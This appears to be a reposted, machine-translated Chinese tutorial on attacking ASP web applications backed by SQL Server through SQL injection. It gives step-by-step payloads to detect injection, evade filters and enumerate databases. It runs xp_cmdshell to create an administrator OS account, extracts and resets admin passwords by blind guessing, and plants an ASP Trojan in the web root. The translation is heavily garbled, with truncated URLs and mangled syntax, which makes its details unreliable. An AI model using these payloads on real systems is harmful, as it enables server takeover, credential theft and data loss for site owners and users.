2. Tech
  3. SQL summary

SQL summary

xiaoxiao2021-03-05  31

This article is the analysis and summary of a large number of similar articles on the Internet, combined with the experience in the process of its own implementation, there are many direct references, there is no attention, please forgive me for disclosure of B / S mode development Develop, programmers who use this model to write applications are getting more and more. However, due to the level and experience of the programmer, a considerable number of programmers do not judge the legality of the user input data when writing code, so that the application has security hazards. Users can submit a database query code, obtain certain data he wants, which is the so-called SQL Injection, ie SQL Injection, is SQL Injection, which is the so-called SQL Injection, which is SQL Injection. SQL injection is accessed from normal WWW port, and the surface looks with the general web page access, there is no difference in web page access, so the current market firewall will not issue an alert to SQL injection. If the administrator does not view the habit of IIS logs, it may be invaded Will not find out for a long time. However, the technique of SQL injection is quite flexible, and there will be many unexpected situations when injected. Can you analyze and construct a smart SQL statement according to the specific situation, thereby successfully acquired the desired data. According to statistics, the website uses ASP Access or SQLServer to account for more than 70%, PHP MySQ accounts for L20%, and there are less than 10% of others. In this article, the principles, methods and processes of SQL injection are illustrated in SQL-Server ASP. (PHP Injection] Another article written by another friend of the NB Alliance Zwell) The overall idea of ​​SQL injection attack is: l Discover the SQL injection position; l Judge the background database type; l Determine XP_cmdshell executable LW Discovery Web virtual directory l Upload an ASP Trojan; L is available to administrator privileges; In the ASP dynamic web page of the parameter, sometimes there may only be one parameter in a dynamic web page, sometimes there may be n parameters, sometimes integer, sometimes string-type parameters, and cannot be generalized. In short, as long as it is a dynamic web page with parameters and this page accesses the database, it is possible to have SQL injection. If the ASP programmer does not have a safety awareness, there is no possibility of SQL injection without the necessary character filtration. In order to fully understand the information of the dynamic web page answer, please adjust the configuration of the IE. Put the IE-Tool -Internet option - Advanced - Show the Hook out in front of the friendly HTTP error message. In order to clear the problem, the following is analyzed as an example with http://xx.xxx.xxx/abc.asp?p =yy, yy may be integer, or it is possible to be a string. 1. Judgment of integer parameters When the input parameter yy is integrity, the SQL statement in ABC.ASP is generally as follows: SELECT * FROM table name where field = yy, so you can use the following steps to test whether SQL injection exists.

1HTTP: //xxx.xxx.xxx/abc.asp? P = yy '(additional single quotes), at this time, the SQL statement in ABC.ASP turns into the SELECT * FROM table name where field = yy', ABC. ASP operation is abnormal; 2http: //xxx.xxx.xxx/abc.asp? p = yy and 1 = 1, ABC.ASP is running normally, and with http://xx.xxx.xxx/abc.asp?p= YY operation results are the same; 3Http: //xxx.xxx.xxx/abc.asp? P = yy and 1 = 2, abc.asp runs unusual; if the above three is fully met, there must be SQL injection vulnerabilities in ABC.ASP. 2. Judgment of the string type parameters When the input parameter yy is a string, the SQL statement in ABC.ASP is generally as follows: SELECT * FROM table name where field = 'yy', so you can use the following steps to test whether SQL injection is exist. 1HTTP: //xxx.xxx.xxx/abc.asp? P = yy '(additional single quotes), at this time, the SQL statement in ABC.ASP turns into the SELECT * FROM table name where field = yy', ABC. ASP operation is abnormal; 2http: //xxx.xxx.xxx/abc.asp? p = yy & nb ... 39; 1 '=' 1 ', ABC.ASP is working properly, and http://xxx.xxx.xxx /Abc.asp?p=yy operation results are the same; 3http: //xxx.xxx.xxx/abc.asp? p = yy & nb ... 39; 1 '=' 2 ', ABC.ASP operation is abnormal; if the above three The step is fully met, and there must be a SQL injection vulnerability in ABC.ASP. 3, the handling of special circumstances Sometimes the ASP programmer will filter out characters such as single quotes in the programmer to prevent SQL injection. At this point you can try it with the following methods. 1 Calculation: Since the VBS is not case sensitive, the programmer is usually all filtering the uppercase string when filtering, or all of the lowercase strings are filtered, and the case in cases often be ignored. If you use Select, you can replace SELECT, SELECT, and 2Unicode: In IIS, internationalization is achieved in Unicode character set, we can completely enter the character entered in IE into the Unicode string for input. Such as =% 2b, space =% 20, etc.; URLENCode information see Annex I; 3ASCII coding method: You can use the input part or all characters to replace the ASCII code, such as u = chr (85), a = CHR (97) Wait, ASCII information see Annex II;

Second, distinguishing between database server types, Access and SQL-Server are the most commonly used database server, although they all support T-SQL standards, but there are differences, and different databases have different attack methods, must Discrimination. 1. Use the system variable of the database server to distinguish between SQL-Server has system variables such as USER, DB_NAME (), which can not only determine SQL-Server, but also a large amount of useful information can also be obtained. Such as: 1 http://xxx.xxx.xxx/abc.asp?p=yy and user> 0 not only can determine whether it is SQL-Server, but also get the username of the database to the database 2http: // xxx. XXX.xxx/abc.asp?p =yy&n ... db_name ()> 0 Not only can be judged whether it is SQL-Server, but also get the current database name; 2. System table using system table Access is MsysObjects And there is no access permission in the web environment, and SQL-Server system tables are sysObjects, accessible in the web environment. For the following two statements: 1http: //xxx.xxx.xxx/abc.asp? P = yy and (select count (*) from sysobject> 02http: //xxx.xxx.xxx/abc.asp? P = YY and (Select Count (*) from MsysObjects> 0 If the database is SQL-Serve, then the first, ABC.ASP must run normal, and the second will abnormally; if it is access, both will exceed. 3, MSSQL three key system table SYSDATABASES system table: Each database on Microsoft SQL Server takes a line in the table. When SQL Server is initially installed, sysdatabases contains items of Master, Model, MSDB, MSSQLWeb, and Tempdb databases. This table is only stored in the Master database. This table is saved in the Master database, what information is saved in this table? This is very important. He is saved all the library names, as well as the id and some related information. Here I will list it for everyone for the field name and related instructions we use. Name // indicates the name of the library. DBID / / indicates the ID of the library, DBID from 1 to 5 is system. The five libraries of Master, Model, MSDB, MSSQLWeb, Tempdb are respectively, respectively. Use select * from master.dbo.sysdatabases to check all the library names.

SysObjects: In each database of SQL-Server, there is this system table that stores all objects created within the database, such as constraints, defaults, logs, rules, stored procedures, etc., each object occupies a line in the table. The following is the field name and related instructions for this system table. Name, ID, Xtype, Uid, Status: The object name, object ID, object type, user ID, object status of the owner object. Object Type (XTYPE). It can be one of the following object types: c = check constraint D = default or default constraint f = foreign key constraint L = log Fn = scalar function if = embedded table function P = stored procedure pk = primary key constraint (Type Is K) RF = Copy Filter Store S = System Table TF = Table Function TR = Trigger U = User Table UQ = Unique Constraint (Type K) V = View X = Extended Storage When Xtype = 'u' and Status > 0 represents the table established by the user, the object name is the table name, the object ID is the ID value of the table. Use: select * from chouyfd.dbo.sysObjects where xtype = 'u' and status> 0 You can list the table names established in the library chouyfd. Syscolumns: Each of the tables and views occupies a row in the table, and each parameter in the stored procedure also occupies a row in the table. This table is in each database. The main fields are: Name, ID, Colid: Sizes, Table ID, Field ID number, the ID is the ID number that just got to be obtained with sysobjects. Use: Select * from chouyfd.dbo.syscolumns where id = 123456789 Get Chouyfd this library, the ID is a list of all fields in 123456789.

Third, determine XP_cmdshell executable If the account of the current connection data has SA permissions, and the master.dbo.xp_cmdshell extension stored procedure (call this stored procedure can directly use the operating system's shell's shell's shell) can execute correctly, the entire computer can pass the following The method is fully controlled, and all steps in the future can save 1, http: //xxx.xxx.xxx/abc.asp? P = yy & nb ... Er> 0 ABC.ASP performs exception but you can get the user of the current connection database Name (if DBO is displayed, it represents SA). 2, http://xxx.xxx.xxx/abc.asp? P = yy ... me ()> 0 ABC.ASP performs exception but you can get the currently connected database name. 3, http://xxx.xxx.xxx/abc.asp? P = yy; exec master..xp_cmdshell "net user aaa bbb / add" - (Master is the primary database of SQL-Server; semicolon in the name Indicates that SQL-Server performs the statement name before the total number of divisions, continues to execute the following statement; "-" is an annotation, indicating that all the content behind it is only a comment, and the system does not execute) can directly increase the operating system account AAA, The password is BBB. 4, http://xxx.xxx.xxx/abc.asp? P = yy; exec master..xp_cmdshell "net localgroup administrators aaa / add" - adds the original account AAA to the Administrators group. 5, http://xxx.xxx.xxx/abc.asp? P = yy; backuup Database database name to disk = 'c: /inetpub/wwroot/save.db', back up the resulting data content to the web directory Next, use HTTP to download this file (of course, the preferred choice should know the web virtual directory). 6. Create a Unicode vulnerability http://xxx.xx.xxx/abc.asp?p =yyness "C: /winnt/system32/cmd.exe c: / inetpub / Scripts / cmd.exe creates a Unicode vulnerability, through this vulnerability utilization method, completes control over the entire computer (of course, the preferred choice should know the web virtual directory).

4. Discovery Web virtual directory only finds a web virtual directory, you can determine where ASP Trojans are placed, and User privileges are obtained. There are two ways to be more effective. First, based on experience, it is generally, the web virtual directory is: c: / inetpub / wwwroot; d: / inetpub / wwwroot; E: / INETPUB / WWWROOT, etc., and executable virtual directory is: C: / inetpub / Scripts; D: / INETPUB / SCRIPTS; E: / INETPUB / SCRIPTS, etc. The second is to traverse the system's directory structure, analyze the results and discover the web virtual directory; first create a temporary table: Temphttp: //xxx.xxx.xxx/abc.asp? P = yy; create & n ... mp (ID nvarchar (255 Num1 nVarchar (255), Num2 nVarchar (255), Num3 nVarchar (255)); - Next: (1) We can use XP_availableMedia to get all current drives and store them in the TEMP table: http: // xxx.xxx.xxx/abc.asp?p =yy;insert temp ... Ter.dbo.xp_availablemedia; - We can get drive lists and related information by querying Temp content (2) We can use XP_SUBDIRS to get sub- Directory list and deposit into the TEMP table: http: //xxx.xxx.xxx/abc.asp? P = yy; Insert Into Temp (i ... dbo.xp_subdirs 'C: /'; - (3) We can also use XP_Dirtree to get all subdirectories of the directory tree structure, inch into the TEMP table: http: //xxx.xxx.xxx/abc.asp? P = yy; Insert Into Temp (ID, NUM1) Exec Master. DBO.XP_DIRTREE 'C: /'; - This can successfully browse to all directories (folder) list: If we need to view the content of a file, you can perform XP_cmdsell: http: //xxx.xxx. XXX / abc.asp? p = yy; INSERT INTO TEMP (ID) Exec ... nbsp; 'type c: /web/index.asp'; - Use 'Bulk Insert' syntax to insert a text file into one Temporary table. Such as: Bulk INSERT TEMP (ID) from 'c: /inetpub/wwroot/index.asp' browsing Temp can see the content of the index.asp file! By analyzing a variety of ASP files, you can get a large number of systems Information, web construction and management information, can even get the connection password for the SA account.

Of course, if XP_cmshell is executable, we can use it to complete: http: //xxx.xxx.xxx/abc.asp? P = yy; Insert Into Temp (ID) & nbs ... cmdshell 'DIR C: /'; --Http: //xxx.xxx.xxx/abc.asp? P = yy; INSERT INTO TEMP (ID) & n ... p_cmdshell 'DIR C: / * .ASP / S / A';

Through XP_cmdshell we can see all you want to see, including W3SVCHTTP: ///xxx.xxx.xxx/abc.asp? P = yy; Insert Into Temp (ID) exec master.dbo.xp_cmdshe ... ub / adminsscripts / Adsutil.vbs Enum W3SVC 'However, if not SA permissions, we can also use http://xx.xxx.xxx/abc.asp?p =yy;insert Into Temp (ID, NUM1) exec master.dbo.xp_dirtree' C: / ';

Note: 1, after each of the above browsing, you should delete all the contents in Temp, the delete method is: http: //xxx.xxx.xxx/abc.asp? P = yy; delete from temp; - 2, The way to browse the TEMP table is: (Suppose TestDB is the current connection database name) http://xxx.xxx.xxx/abc.asp?p=yy and (select Top & ... nbsp; testdb.dbo.temp)> 0 Get the value of the first record ID field in TEMP, and compare with integers, obviously ABC.ASP works exception, but can discover the value of the ID field in an exception. Suppose the table name of the discovery is XYZ, http://xxx.xxx.xxx/abc.asp?p=yy and (select top 1 id ... ERE ID NOT IN ('XYZ'))> 0 get the table The value of the second record ID field in the TEMP.

5. Upload ASP Trojan's so-called ASP Trojan, is an ASP code with special functions, and put it under the Scripts of the web virtual directory, remote customers can perform it through IE, and then get the system's USER rights, implement preliminary control of the system. . Uploading ASP Trojans generally have two more effective methods: 1. Using the web site remote management function, for maintenance, it provides remote management features; there are also many Web sites, its content is for different users. Have different access rights. In order to achieve the control of the user's rights, there is a web page, requiring the username and password, only the correct value is entered, can be used to perform the next operation, can implement the Web management, such as uploading, downloading files, directory browsing, modifying Configuration, etc. Therefore, if you get the correct username and password, you can upload an ASP Trojan, but sometimes you can directly get the USER rights and browse the system, the previous "Discovery Web Virtual Directory" complex operation can be omitted. Username and password are typically stored in a table, discovering this table and resolving issues. Two effective methods are given below. A, Injection: In theory, the authentication web page will have a type: select * from admin where username = 'xxx' and password = 'yyy' statement, if the necessary characters are not performed before it is officially running this sentence Filtering, it is easy to implement SQL injection. Enter: ABC 'or 1 = 1 - In the user name text box: 123 SQL statement becomes: select * from admin where username =' abc 'or 1 = 1 and password =' ​​123 ' Regardless of the user to enter any username and password, this statement will always be executed correctly, and the user easily deceives the system and obtain legal identity. B, guess: Basic ideas are: guess all database names, guess each table name in the library, the analysis may be the name of the username and password, guess each field name in the table, guess the table Each recording content in the middle. l Guess all database name http://xx.xxx.xxx/abc.asp?p =yy and (select count (*) from master.dbo.sysdatabases where name> 1 and dbid = 6) <> 0 because DBID The value ranges from 1 to 5, which is the system. So the user's own built must start from 6. And we submit Name> 1 (Name field is a characteristic field and digital comparison will be wrong), ABC.ASP works exception, you can get the first database name, and change DBID to 7, 8, 9, 10, 11, 12 ... You can get all database names. The following assumptions the obtained database name is TestDB.

l Guely guess the name of the user's name table in the database, this method is based on personal experience. In general, User, User, Member, Members, UserList, Memberlist, Userinfo, Manager, Admin, Admin, Systemuser, Systemusers , sysuser, sysusers, sysaccounts, systemaccounts, etc. And judges by statement http://xx.xxx.xxx/abc.asp?p=yy and (select count (*) from testdb.dbo. Table name)> 0 If the table name exists, ABC.ASP works fine Otherwise it will. This is cycled until the name of the system account table is guess. Reading method: SQL-Server has a table sysObjects that store system core information. All tables, view and other information are all stored in this table, and this table can be accessed via the web. When Xtype = 'u' and status> 0 represents the table established by the user, discover and analyze the table and name of each user, you can get the name of the username, the basic implementation method is: 1Http: //xxx.xxx .xxx / abc.asp? p = yy and (select top 1 name from testd ... type = 'u' and status> 0)> 0 Get the name of the first user established table, and compare with integers, obviously ABC.ASP works exception, but in exceptions, you can find the name of the table. Assuming the name of the discovery is XYZ, then 2http: //xxx.xxx.xxx/abc.asp? P = yy and (select top 1 name from testdb.dbo.sysobjects & ... tatus> 0 and name not in (' XYZ '))> 0 You can get the name of the table established by the second user, which can get the name of the created table. According to the name of the table, you can usually determine the table user to store the username and password. The following assumptions this table name is admin. l Guess the username and password field name The admin table must have a username field in the admin table, and there must be a password field. Only the names of this two fields are available. How to get their name, the same method is equally below. Treatment: This method is based on personal experience guessing the word name. Generally, the name of the username is often used: UserName, Name, User, Account, etc. The name of the password field is common: Password, Pass, PWD, Passwd, etc. And judges by statement http://xx.xxx.xxx/abc.asp?p=yy and (Select Count "from testdb.dbo.admin)> 0" SELECT Count "from the" SELECT COUNT " The statement gets the number of rows of the table, so if the field name exists, ABC.ASP works fine, otherwise it will. This is cycled until you guess the names of the two fields. Reading method: Basic implementation method is http://xxx.xxx.xxx/abc.asp?p=yy and (select ... me ('admin ", 1) from testdb.dbo.sysObjects > 0.

SELECT TOP 1 Col_Name (Object_ID ('admin ", 1) from testdb.dbo.sysObjects is the first field name of the known table name from sysObjects, compared with integers, obviously abc.asp work exception, but Once the abnormality can find the name of the field. All field names can be obtained in sections 1, 3, 4, 5, 6 ... l Conjecting the username and password The most common use of the user name and password is also the most efficient method: ASCII code verbal decoding method: Although this method is slower, it must be feasible. The basic idea is to guess the length of the field, and then guess the value of each bit. Guess the user name is the same as the guess code. The following is the following to guess the username as an example. Http://xxx.xxx.xxx/abc.asp?p=yy and (select Top & n ... nbsp; from testdb.dbo.admin) = x (x = 1, 2, 3, 4, 5, ... N Username is the name of the username, and the name of the application is the name of the table. When X is a certain value i and the ABC.ASP is running normally, I is the length of the first username. Such as: When entering http://xxx.xxx.xxx/abc.asp?p=yy and (select top ... e) from testdb.dbo.admin) = 8, ABC.ASP is running normally, then first The length of the user name is 8 http: //xxx.xxx.xxx/abc.asp? P = yy and (SEL ... ASCII (SUBSTRING (UserName, M, 1)) from testdb.dbo.admin) = n (M The value between 1 to one step is between the length of the user name, when M = 1, 2, 3, ... when speculating the value of the first, 2, 3, ..., the value of N, N is 1 ~ 9, A ~ Z, A ~ Z ASCII, that is, any value between 1 to 128; admin is the name of the system user account table), if n is a certain value i and the ABC.ASP is running normally, i corresponds to ASCII The code is a certain value of the username. Such as: When entering http://xxx.xxx.xxx/abc.asp?p=yy and (SEL ... ASCII (Substring (UserName, 3, 1)) from testdb.dbo.admin) = 80 ABC. The ASP is running normally, then the third bit of the username is P (the ASCII 80); http: //xxx.xxx.xxx/abc.asp? p = yy and (SEL ... ASCII (Substring (username, 9, 1)) from testdb.dbo.admin) = 33 When ABC.ASP runs normally, the 9th bit of the username! (ASCII is 80); guessed the first username and password, If you can guess all other user names and passwords. Note: Sometimes the password that may be encrypted by MD5, but also needs to be detached with a special tool. Or change your password first, then change it, see below. Simple method: guess user name http://xxx.xxx.xxx/abc.asp?p=yy and (select top 1 ... o.admin where username> 1), FLAG is a field in the admin table, UserName is a username field, at which point ABC.ASP works exception, but can get the value of UserName.

Similar methods, you can get the second user name, the third user, etc. until all usernames in the table. Guess user password: http://xxx.xxx.xxx/abc.asp? P = yy and (select top 1 & nb ... b.dbo.admin where pwd> 1), FLAG is a field in the admin table, PWD Is a password field, at this time, ABC.ASP works exception, but it can get the value of the PWD. Similarly to the same method, you can get the password of the second user name, the password of the third user, etc., until the password of all users in the table. The password is sometimes encrypted by MD5 and can be changed. Http://xxx.xxx.xxx/abc.asp?p=yy;Update testdb.dbo.admin set pwd = '... where username =' www '; - (1 MD5 value: Aaabbbcccdddeeef, ie Change the password to 1; WWW is known as the known username), of course, can certainly change the password. 2. Use the table content to guide the file function SQL has a BCP command, which can convert the contents of the table into the text file and put it in the specified location. With this feature, we can build a temporary table first, then enter an ASP Trojan in a row in a row, then export the ASP file with the BCP command. The command line format is as follows: BCP "Select * from text..foo" Queryout c: /inetpub/wwroot/runcommand.asp -c -s localhost -u sa -p foobar ('s' parameter is the server executing the query,' U 'The parameter is the username,' p 'parameter is a password, and finally uploaded a Runcommand.asp Trojan)

6. Getting the system administrator privilege ASP Trojan only USER privileges, to get full control of the system, there must be a system administrator privilege. How to do? There are many ways to upgrade permissions: uploading Trojans, modify the boot automatically run. Ini file (it is open, it is dead); copy cmd.exe to Scripts, people create Unicode vulnerability; download SAM files, crack and get OS All username passwords;, etc., depending on the specific situation of the system, different methods can be taken.

Seven, some special means of SQL-SERVER 1, extended the use of stored procedures to modify the registry xp_regread [xp_regread] Another useful function is a built-in storage procedure set xp_regXXXX class (Xp_regaddmultistring, Xp_regdeletekey, Xp_regdeletevalue, Xp_regenumkeys, Xp_regenumvalues, Xp_regread, Xp_regremovemultistring, XP_RegWrite). An attacker can use these functions to modify the registry, such as reading the SAM value, allowing an empty connection, automatic running procedure, etc. Such as: exec XP_regread hkey_local_machine, 'system / currentcontrolset / services / lantserver / parameters', 'nullsessionshares' determines what kind of session connection is available in the server. EXEC XP_REGENUMVALUES HKEY_LOCAL_MACHINE, 'System / CurrentControlSet / Services / SNMP / Parameters / ValidCommunities' Display All SNMP community configurations on the server, with this information, the attacker may reconfigure network devices in the same network. 2. Use other stored procedures to change the server XP_ServiceControl procedure to allow users to start, stop service. Such as: (exec master..xp_servicecontrol 'start', 'schedule' exec master..xp_servicecontrol 'start', 'server') Xp_availablemedia display useful Xp_dirtree drive machine allows to obtain a tree Xp_enumdsn include ODBC data source on the server Xp_loginconfig Get server security information XP_makecab allows the user to create a compressed file XP_ntsec_enumdomains on the server to enumerate the process ID of the server that the server can enter, and terminate this process attachment 1: URLUNICODE table (EFC1738) Character, RFC1738) Character Special character Meaning URL encoding # Used to mark specific document position% 23% to encode% 25 & Separate different variable values ​​to% 26 in variable value 2B /% 5c = Used to connect to the key and value% 3D? Represents the start% of the query string% 3F space% 20. Jembol% ​​2e: colon% 3A

转载请注明原文地址:https://www.9cbs.com/read-34040.html

9cbs

New Post(0)